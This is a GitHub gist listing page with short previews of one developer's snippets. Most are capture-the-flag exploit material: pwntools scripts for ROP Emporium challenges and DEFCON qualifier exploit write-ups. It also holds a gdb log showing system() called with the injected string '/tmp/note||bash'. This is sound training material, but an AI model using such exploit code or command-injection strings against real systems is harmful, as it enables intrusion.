Skip to content

Instantly share code, notes, and snippets.

View zachriggle's full-sized avatar

Zach Riggle zachriggle

490 followers · 177 following
View GitHub Profile
@zachriggle
zachriggle / gist:a363d271b29ab5943f64
Created October 13, 2014 07:54
>>> class A(object): pass
...
>>> a = A()
>>> a.__len__ = lambda: 3
>>> a.__len__()
3
>>> len(a)
Traceback (most recent call last):
...
TypeError: object of type 'A' has no len()
@zachriggle
zachriggle / gdb-python2.7-ubuntu.sh
Created October 16, 2014 22:35
apt-get install python2.7-dev python2.7
apt-get build-dep gdb
apt-get source gdb
sed -i -E "s|python3|/usr/bin/python2.7|" debian/rules
dpkg-buildpackage -uc -us -j8
dpkg-install ../*.deb
@zachriggle
zachriggle / wat.md
Created November 29, 2014 05:19

gdb-peda$ x/i $pc => 0xf763d100 <__libc_system>: push ebx gdb-peda$ telescope $sp 2 00:0000| esp 0x188340de --> 0x8048c0d (add esp,0x10) 01:0004| 0x188340e2 --> 0x188340f2 ("/tmp/note||bash") gdb-peda$ continue ... Stopped reason: SIGSEGV 0xf763ce3c in do_system (line=0x188340f2 "/tmp/note||bash") at ../sysdeps/posix/system.c:153

@zachriggle
zachriggle / README.md
Last active June 15, 2016 02:51

DEFCON Quals 2016 Pwnable -- GladOS

The write-up is basically the exploit.

@zachriggle
zachriggle / README.md
Last active May 25, 2016 07:20
DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit

DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit Write-Up

The write-up is the exploit.

Example Output

[*] './heapfun4u'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
@zachriggle
zachriggle / win.py
Created June 17, 2016 23:09
from pwn import *
# Here's the disassembly for everything
"""
0804844b <vulnerable_function>:
804844b: 55 push ebp
804844c: 89 e5 mov ebp,esp
804844e: 81 ec 88 00 00 00 sub esp,0x88
8048454: 83 ec 04 sub esp,0x4
8048457: 68 00 01 00 00 push 0x100
@zachriggle
zachriggle / win2.py
Last active June 21, 2016 00:43
from pwn import *
# Here's the disassembly for everything
"""
0804844b <vulnerable_function>:
804844b: 55 push ebp
804844c: 89 e5 mov ebp,esp
804844e: 81 ec 88 00 00 00 sub esp,0x88
8048454: 83 ec 04 sub esp,0x4
8048457: 68 00 01 00 00 push 0x100
@zachriggle
zachriggle / keybase.md
Created September 15, 2016 22:36

Keybase proof

I hereby claim:

  • I am zachriggle on github.
  • I am zachriggle (https://keybase.io/zachriggle) on keybase.
  • I have a public key ASBYNpGGwzmRUnRb5-fg2Qy7jdirdXG-ECeIbGP_Lv72oQo

To claim this, I am signing this object:

@zachriggle
zachriggle / win.py
Created September 1, 2017 20:35
Example Exploit for ROP Emporium's ret2win Challenge Raw
from pwn import *
# Set up pwntools to work with this binary
elf = context.binary = ELF('ret2win')
# Enable verbose logging so we can see exactly what is being sent.
context.log_level = 'debug'
# Print out the target address
info("%#x target", elf.symbols.ret2win)
@zachriggle
zachriggle / win.py
Created September 25, 2017 23:03
Exploit for ROP Emporium's "split"
from pwn import *
# Set up pwntools to work with this binary
elf = context.binary = ELF('split')
# We need to invoke system("cat flag"), which requires knowing the
# location of both the function 'system' as well as the string 'cat flag'.
system = elf.symbols.system
cat_flag = elf.search("cat flag").next()